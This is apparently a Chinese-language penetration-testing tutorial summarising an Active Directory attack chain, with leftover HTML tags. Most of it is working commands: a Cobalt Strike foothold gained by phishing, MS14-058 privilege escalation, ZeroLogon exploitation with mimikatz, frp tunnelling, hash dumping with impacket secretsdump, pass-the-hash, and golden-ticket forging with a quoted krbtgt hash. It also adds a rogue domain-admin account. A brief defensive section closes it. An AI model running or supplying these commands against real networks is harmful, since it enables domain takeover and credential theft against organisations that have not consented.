内网渗透实战思路总结<\/h1>

1. 初始入侵与权限提升<\/h2>

1.1 初始入侵方式<\/h3>
采用钓鱼攻击获取第一台外网服务器权限<\/li>
设置Cobalt Strike beacon响应为实时模式<\/li> <\/ul>
1.2 信息收集<\/h3>
shell systeminfo  # 获取系统信息<\/span>
<\/span><\/span><\/code><\/pre>
记录系统版本(如Win7)<\/li>
查看已安装补丁(示例中显示3个补丁)<\/li>
通过补丁信息寻找可利用漏洞<\/li>
<\/ul>
1.3 提权操作<\/h3>

根据系统版本和补丁情况选择提权漏洞(示例使用MS14-058)<\/li>
提权成功后建立后门进行权限维持<\/li>
可设置计划任务等持久化手段<\/li>
<\/ul>
2. 内网探测与域环境分析<\/h2>
2.1 网络信息收集<\/h3>
shell ipconfig \/all  # 查看网络配置<\/span>
<\/span><\/span><\/code><\/pre>
识别是否存在域环境<\/li>
检查网卡配置(示例为双网卡)<\/li>
记录DNS服务器地址(示例为10.10.3.6)<\/li>
<\/ul>
2.2 内网主机扫描<\/h3>

使用nbtscan工具扫描内网存活主机<\/li>
重点关注域控(DC)标志的主机<\/li>
记录域控计算机名和IP地址(后续票据攻击会用到)<\/li>
<\/ul>
3. 横向移动技术<\/h2>
3.1 漏洞利用准备<\/h3>

上传mimikatz工具<\/li>
检查CVE-2020-1472(ZeroLogon)漏洞<\/li>
<\/ul>
lsadump::zerologon \/target:域控IP \/account:域控主机名$
<\/span><\/span><\/code><\/pre>3.2 代理搭建<\/h3>

上传frpc.exe和frp.ini配置文件<\/li>
在渗透机设置端口映射接收连接<\/li>
<\/ul>
shell frpc.exe -c frp.ini  # 启动代理<\/span>
<\/span><\/span><\/code><\/pre>
在Kali设置代理(示例使用7000端口)<\/li>
<\/ul>
3.3 ZeroLogon漏洞利用<\/h3>
shell mimikatz "lsadump::zerologon \/target:域控ip \/account:域控主机名<\/span>$ \/exploit"<\/span> "exit"<\/span>
<\/span><\/span><\/code><\/pre>
成功后域控密码被置空<\/li>
使用secretsdump提取哈希值<\/li>
<\/ul>
proxychains impacket-secretsdump -no-pass -just-dc 域名.com\/域控主机名\$<\/span>@域控ip
<\/span><\/span><\/code><\/pre>
记录关键哈希值(Administrator和krbtgt)<\/li>
<\/ul>
3.4 哈希传递攻击(PTH)<\/h3>
proxychains python3 wmiexec.py -hashes 获得的hash .\/用户名@域控ip
<\/span><\/span><\/code><\/pre>3.5 权限恢复与维持<\/h3>

导出SAM、SYSTEM、SECURITY文件<\/li>
使用secretsdump提取原始机器码<\/li>
<\/ul>
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
<\/span><\/span><\/code><\/pre>
恢复域控原始密码<\/li>
<\/ul>
proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash
<\/span><\/span><\/code><\/pre>4. 跨域攻击技术<\/h2>
4.1 黄金票据制作<\/h3>

使用mimikatz获取父子域SID<\/li>
<\/ul>
shell mimikatz "privilege::debug"<\/span> "lsadump::lsa \/patch \/user:administrator<\/span>$"<\/span> "lsadump::trust \/patch"<\/span> "exit"<\/span>
<\/span><\/span><\/code><\/pre>
黄金票据要点:

用户名: administrator<\/li>
域名: 当前域控名.com<\/li>
SID: 子域控SID<\/li>
SIDs: 父域SID-519<\/li>
krbtgt哈希: c696e9337845d8ada46612d047e40209<\/li>
<\/ul>
<\/li>
<\/ul>
4.2 票据攻击执行<\/h3>
shell "kerberos::golden \/user:administrator \/domain:现在所在域控名.com \/sid:子域控sid \/sids:父域sid-519 \/krbtgt:c696e9337845d8ada46612d047e40209 \/ptt"<\/span> "exit"<\/span>
<\/span><\/span><\/code><\/pre>4.3 备用跨域方案<\/h3>

开启远程桌面服务<\/li>
<\/ol>
shell net user test QWEasd123 \/add \/domain  # 创建域用户<\/span>
<\/span><\/span>shell net group "Domain Admin"<\/span> test \/add \/domain  # 添加到域管理员组<\/span>
<\/span><\/span><\/code><\/pre>
通过RDP登录后执行黄金票据攻击<\/li>
上传Cobalt Strike payload并使用PsExec上线<\/li>
<\/ol>
5. 工具与命令总结<\/h2>
5.1 关键工具<\/h3>

Cobalt Strike (CS): 用于命令控制<\/li>
mimikatz: 提取凭证、执行票据攻击<\/li>
impacket工具集: secretsdump, wmiexec等<\/li>
frpc: 内网代理工具<\/li>
nbtscan: 内网主机扫描<\/li>
<\/ul>
5.2 常用命令<\/h3>
# 信息收集<\/span>
<\/span><\/span>systeminfo
<\/span><\/span>ipconfig \/all
<\/span><\/span>
<\/span><\/span># 提权与横向移动<\/span>
<\/span><\/span>lsadump::zerologon
<\/span><\/span>impacket-secretsdump
<\/span><\/span>wmiexec.py
<\/span><\/span>
<\/span><\/span># 票据攻击<\/span>
<\/span><\/span>kerberos::golden
<\/span><\/span>lsadump::lsa
<\/span><\/span>lsadump::trust
<\/span><\/span>
<\/span><\/span># 权限维持<\/span>
<\/span><\/span>net user \/add
<\/span><\/span>net group \/add
<\/span><\/span><\/code><\/pre>6. 防御建议<\/h2>

及时安装系统补丁，特别是MS14-058和CVE-2020-1472<\/li>
监控异常的网络连接和代理行为<\/li>
限制域管理员权限，实施最小权限原则<\/li>
监控异常Kerberos票据生成和使用<\/li>
定期检查域控上的用户和组变更<\/li>
实施网络分段，限制内网横向移动<\/li>
监控异常哈希传递行为<\/li>
<\/ol>